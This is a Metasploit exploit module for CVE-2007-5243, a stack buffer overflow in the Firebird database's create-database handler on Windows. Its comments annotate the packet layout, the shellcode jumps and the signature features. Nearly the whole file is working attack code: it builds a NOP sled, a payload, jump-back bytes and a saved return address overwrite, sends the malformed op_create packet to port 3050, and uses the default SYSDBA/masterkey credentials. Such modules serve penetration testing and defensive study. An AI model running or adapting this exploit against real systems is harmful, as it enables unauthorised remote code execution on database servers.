##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for CVE-2007-5243 (OSVDB 38606 / BID 25917): a stack
# buffer overflow in the Firebird/InterBase isc_create_database() request handler.
#
# Only the two Windows builds listed in 'Targets' (WI-V2.0.0.12748 and
# WI-V2.0.1.12855) have a return address here; the 'Brute Force' entry lets the
# BruteTargets mixin try each configured target in turn, and 'Debug' uses an
# obviously invalid address (0xaabbccdd) so a crash is easy to recognise in a
# debugger.  From a defender's view the relevant facts are: the service listens
# on TCP/3050 by default, the malformed request is a single op_create packet whose
# declared length is inflated by 16 KiB of filler, and the module's metadata
# declares the resulting session privileged.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::BruteTargets

  # Module metadata: name, references, payload constraints, targets and the
  # single user option (RPORT, defaulting to Firebird's standard port 3050).
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Firebird Relational Database isc_create_database() Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in Borland InterBase
        by sending a specially crafted create request.
      },
      'Author' =>
        [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'References' =>
        [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38606' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
      'Privileged' => true,
      'License' => MSF_LICENSE,
      # Payload must fit in 512 bytes and avoid NUL plus the path/URL
      # delimiters "/", ":", "@" and "\" -- the overflowing field is treated as
      # a database path by the server, so those bytes would truncate or alter it.
      'Payload' =>
        {
          'Space' => 512,
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
          'StackAdjustment' => -3500,
        },
      # Each target supplies 'Length' (buffer sizes tried by exploit_target) and
      # 'Ret' (the address written over the saved return address).
      'Targets' =>
        [
          [ 'Brute Force', { } ],
          # '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls'
          [
            'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',
            { 'Length' => [ 756 ], 'Ret' => 0x00370b0b }
          ],
          # Debug
          [
            'Debug',
            { 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }
          ],
        ],
      # Index 1 == the unicode.nls target above.
      'DefaultTarget' => 1,
      'DisclosureDate' => '2007-10-03'
    ))

    register_options(
      [
        Opt::RPORT(3050)
      ])
  end

  # Create database parameter block
  #
  # Builds a Firebird DPB (database parameter block): a version byte followed by
  # tag/length/value triples for the user name and password.  The credentials
  # used are the well-known Firebird defaults (SYSDBA / masterkey); whether the
  # vulnerable code path is reached before they are checked is not visible here.
  #
  # @return [String] the encoded DPB
  def dpb_create
    # DPB tag values (isc_dpb_* constants from the Firebird API).
    isc_dpb_user_name = 28
    isc_dpb_password = 29

    isc_dpb_version1 = 1

    user = 'SYSDBA'
    pass = 'masterkey'

    dpb = ''

    # Leading version byte.
    dpb << [isc_dpb_version1].pack('c')

    # tag, one-byte length, value
    dpb << [isc_dpb_user_name].pack('c')
    dpb << [user.length].pack('c')
    dpb << user

    dpb << [isc_dpb_password].pack('c')
    dpb << [pass.length].pack('c')
    dpb << pass

    dpb
  end

  # Calculate buffer padding
  #
  # Number of bytes needed to round +length+ up to a multiple of 4 (the wire
  # protocol aligns variable-length fields on 4-byte boundaries).
  #
  # NOTE(review): the default value '' has no #remainder method and would raise
  # NoMethodError; both callers in this file pass an Integer, so the default is
  # never used.
  #
  # @param length [Integer] size of the field being padded
  # @return [Integer] 0..3
  def buf_padding(length = '')
    remainder = length.remainder(4)
    padding = 0

    if remainder > 0
      padding = (4 - remainder)
    end

    padding
  end

  # Sends one op_create request per configured 'Length' for the given target.
  #
  # Wire layout of each request (all integers big-endian unless noted):
  #   op code (20 = op_create), id (0), declared length, then a name field of
  #   exactly that length consisting of NOP sled + payload + a 13-byte trailer
  #   + 16 KiB of filler, NUL-padded to a 4-byte boundary, followed by the DPB
  #   length, the DPB and its padding.  The inflated length field and the large
  #   alphabetic filler are the features a network signature would key on.
  #
  # Called by the BruteTargets mixin; +target+ is the selected target (or each
  # target in turn when 'Brute Force' is chosen).
  #
  # @param target [Msf::Module::Target] target whose 'Length' and 'Ret' are used
  def exploit_target(target)

    target['Length'].each do |length|

      connect

      # Create database
      op_create = 20

      # Extra padding to trigger the exception
      extra_padding = 1024 * 16

      buf = ''

      # Operation/packet type
      buf << [op_create].pack('N')

      # Id
      buf << [0].pack('N')

      # Length
      buf << [length + extra_padding].pack('N')

      # Nop block
      # 13 = size of the trailer appended after the payload (5 + 2 + 2 + 4
      # bytes below), so NOPs + payload + trailer add up to exactly +length+.
      buf << make_nops(length - payload.encoded.length - 13)

      # Payload
      buf << payload.encoded

      # Jump back into the nop block
      # e9 rel32 (5 bytes), displacement -516 (little-endian).
      buf << "\xe9" + [-516].pack('V')

      # Jump back
      # eb rel8 (2 bytes), -7 lands on the e9 instruction above.
      buf << "\xeb" + [-7].pack('c')

      # Random alpha data
      buf << rand_text_alpha(2)

      # Target
      # Saved return address overwrite (little-endian).
      buf << [target.ret].pack('V')

      # Random alpha data
      buf << rand_text_alpha(extra_padding)

      # Padding
      buf << "\x00" * buf_padding(length + extra_padding)

      # Database parameter block

      # Create database parameter block
      dpb = dpb_create

      # Database parameter block length
      buf << [dpb.length].pack('N')

      # Database parameter block
      buf << dpb

      # Padding
      buf << "\x00" * buf_padding(dpb.length)

      sock.put(buf)

      # Kernel#select with no descriptors acts as a 4-second sleep before
      # checking for a session.
      select(nil,nil,nil,4)

      handler

    end

  end
end